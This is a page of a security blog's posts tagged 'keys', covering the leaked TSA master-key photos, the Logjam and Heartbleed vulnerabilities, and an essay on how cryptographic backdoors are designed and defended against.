Entries Tagged "keys"

Page 7 of 15

TSA Master Keys

Someone recently noticed a Washington Post story on the TSA that originally contained a detailed photograph of all the TSA master keys. It’s now blurred out of the Washington Post story, but the image is still floating around the Internet. The whole thing neatly illustrates one of the main problems with backdoors, whether in cryptographic systems or physical systems: they’re fragile.

Nicholas Weaver wrote:

TSA “Travel Sentry” luggage locks contain a disclosed backdoor which is similar in spirit to what Director Comey desires for encrypted phones. In theory, only the Transportation Security Agency or other screeners should be able to open a TSA lock using one of their master keys. All others, notably baggage handlers and hotel staff, should be unable to surreptitiously open these locks.

Unfortunately for everyone, a TSA agent and the Washington Post revealed the secret. All it takes to duplicate a physical key is a photograph, since it is the pattern of the teeth, not the key itself, that tells you how to open the lock. So by simply including a pretty picture of the complete spread of TSA keys in the Washington Post’s paean to the TSA, the Washington Post enabled anyone to make their own TSA keys.

So the TSA backdoor has failed: we must assume any adversary can open any TSA “lock”. If you want to at least know your luggage has been tampered with, forget the TSA lock and use a zip-tie or tamper-evident seal instead, or attach a real lock and force the TSA to use their bolt cutters.

It’s the third photo on this page, reproduced here. There’s also this set of photos. Get your copy now, in case they disappear.

Reddit thread. BoingBoing post. Engadget article.

EDITED TO ADD (9/10): Someone has published a set of CAD files so you can make your own master keys.

Posted on September 8, 2015 at 6:02 AMView Comments

The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve—the most efficient algorithm for breaking a Diffie-Hellman connection—is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation—just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

EDITED TO ADD: The DH precomputation easily lends itself to custom ASIC design, and is something that pipelines easily. Using BitCoin mining hardware as a rough comparison, this means a couple orders of magnitude speedup.

EDITED TO ADD (5/23): Good analysis of the cryptography.

EDITED TO ADD (5/24): Good explanation by Matthew Green.

Posted on May 21, 2015 at 6:30 AMView Comments

Subconscious Keys

I missed this paper when it was first published in 2012:

“Neuroscience Meets Cryptography: Designing Crypto Primitives Secure Against Rubber Hose Attacks”

Abstract: Cryptographic systems often rely on the secrecy of cryptographic keys given to users. Many schemes, however, cannot resist coercion attacks where the user is forcibly asked by an attacker to reveal the key. These attacks, known as rubber hose cryptanalysis, are often the easiest way to defeat cryptography. We present a defense against coercion attacks using the concept of implicit learning from cognitive psychology. Implicit learning refers to learning of patterns without any conscious knowledge of the learned pattern. We use a carefully crafted computer game to plant a secret password in the participant’s brain without the participant having any conscious knowledge of the trained password. While the planted secret can be used for authentication, the participant cannot be coerced into revealing it since he or she has no conscious knowledge of it. We performed a number of user studies using Amazon’s Mechanical Turk to verify that participants can successfully re-authenticate over time and that they are unable to reconstruct or even recognize short fragments of the planted secret.

Posted on January 28, 2015 at 6:39 AMView Comments

More on Heartbleed

This is an update to my earlier post.

Cloudflare is reporting that it’s very difficult, if not practically impossible, to steal SSL private keys with this attack.

Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data. Note that is not the same as saying it is impossible to use Heartbleed to get private keys. We do not yet feel comfortable saying that. However, if it is possible, it is at a minimum very hard. And, we have reason to believe based on the data structures used by OpenSSL and the modified version of NGINX that we use, that it may in fact be impossible.

The reasoning is complicated, and I suggest people read the post. What I have heard from people who actually ran the attack against a various servers is that what you get is a huge variety of cruft, ranging from indecipherable binary to useless log messages to peoples’ passwords. The variability is huge.

This xkcd comic is a very good explanation of how the vulnerability works. And this post by Dan Kaminsky is worth reading.

I have a lot to say about the human aspects of this: auditing of open-source code, how the responsible disclosure process worked in this case, the ease with which anyone could weaponize this with just a few lines of script, how we explain vulnerabilities to the public—and the role that impressive logo played in the process—and our certificate issuance and revocation process. This may be a massive computer vulnerability, but all of the interesting aspects of it are human.

EDITED TO ADD (4/12): We have one example of someone successfully retrieving an SSL private key using Heartbleed. So it’s possible, but it seems to be much harder than we originally thought.

And we have a story where two anonymous sources have claimed that the NSA has been exploiting Heartbleed for two years.

EDITED TO ADD (4/12): Hijacking user sessions with Heartbleed. And a nice essay on the marketing and communications around the vulnerability

EDITED TO ADD (4/13): The US intelligence community has denied prior knowledge of Heatbleed. The statement is word-game free:

NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private sector cybersecurity report. Reports that say otherwise are wrong.

The statement also says:

Unless there is a clear national security or law enforcement need, this process is biased toward responsibly disclosing such vulnerabilities.

Since when is “law enforcement need” included in that decision process? This national security exception to law and process is extending much too far into normal police work.

Another point. According to the original Bloomberg article:

http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html

Certainly a plausible statement. But if those millions didn’t discover something obvious like Heartbleed, shouldn’t we investigate them for incompetence?

Finally—not related to the NSA—this is good information on which sites are still vulnerable, including historical data.

Posted on April 11, 2014 at 1:10 PMView Comments

Heartbleed

Heartbleed is a catastrophic bug in OpenSSL:

“The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users.

Basically, an attacker can grab 64K of memory from a server. The attack leaves no trace, and can be done multiple times to grab a different random 64K of memory. This means that anything in memory—SSL private keys, user keys, anything—is vulnerable. And you have to assume that it is all compromised. All of it.

“Catastrophic” is the right word. On the scale of 1 to 10, this is an 11.

Half a million sites are vulnerable, including my own. Test your vulnerability here.

The bug has been patched. After you patch your systems, you have to get a new public/private key pair, update your SSL certificate, and then change every password that could potentially be affected.

At this point, the probability is close to one that every target has had its private keys extracted by multiple intelligence agencies. The real question is whether or not someone deliberately inserted this bug into OpenSSL, and has had two years of unfettered access to everything. My guess is accident, but I have no proof.

This article is worth reading. Hacker News thread is filled with commentary. XKCD cartoon.

EDITED TO ADD (4/9): Has anyone looked at all the low-margin non-upgradable embedded systems that use OpenSSL? An upgrade path that involves the trash, a visit to Best Buy, and a credit card isn’t going to be fun for anyone.

EDITED TO ADD (4/10): I’m hearing that the CAs are completely clogged, trying to reissue so many new certificates. And I’m not sure we have anything close to the infrastructure necessary to revoke half a million certificates.

Possible evidence that Heartbleed was exploited last year.

EDITED TO ADD (4/10): I wonder if there is going to be some backlash from the mainstream press and the public. If nothing really bad happens—if this turns out to be something like the Y2K bug—then we are going to face criticisms of crying wolf.

EDITED TO ADD (4/11): Brian Krebs and Ed Felten on how to protect yourself from Heartbleed.

Posted on April 9, 2014 at 5:03 AMView Comments

"Unbreakable" Encryption Almost Certainly Isn't

This headline is provocative: “Human biology inspires ‘unbreakable’ encryption.”

The article is similarly nonsensical:

Researchers at Lancaster University, UK have taken a hint from the way the human lungs and heart constantly communicate with each other, to devise an innovative, highly flexible encryption algorithm that they claim can’t be broken using the traditional methods of cyberattack.

Information can be encrypted with an array of different algorithms, but the question of which method is the most secure is far from trivial. Such algorithms need a “key” to encrypt and decrypt information; the algorithms typically generate their keys using a well-known set of rules that can only admit a very large, but nonetheless finite number of possible keys. This means that in principle, given enough time and computing power, prying eyes can always break the code eventually.

The researchers, led by Dr. Tomislav Stankovski, created an encryption mechanism that can generate a truly unlimited number of keys, which they say vastly increases the security of the communication. To do so, they took inspiration from the anatomy of the human body.

Regularly, someone from outside cryptography—who has no idea how crypto works—pops up and says “hey, I can solve their problems.” Invariably, they make some trivial encryption scheme because they don’t know better.

Remember: anyone can create a cryptosystem that he himself cannot break. And this advice from 15 years ago is still relevant.

Another article, and the paper.

Posted on April 8, 2014 at 6:16 AMView Comments

Tor Appliance

Safeplug is an easy-to-use Tor appliance. I like that it can also act as a Tor exit node.

EDITED TO ADD: I know nothing about this appliance, nor do I endorse it. In fact, I would like it to be independently audited before we start trusting it. But it’s a fascinating proof-of-concept of encapsulating security so that normal Internet users can use it.

Posted on November 27, 2013 at 6:28 AMView Comments

Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous talk on “trusting trust” (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).
  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.
  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.
  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.
  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.
  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.
  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there’s more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.
  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.
  • There should be no master secrets. These are just too vulnerable.
  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.
  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information.

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

Posted on October 22, 2013 at 6:15 AMView Comments

1 5 6 7 8 9 15

Sidebar photo of Bruce Schneier by Joe MacInnis.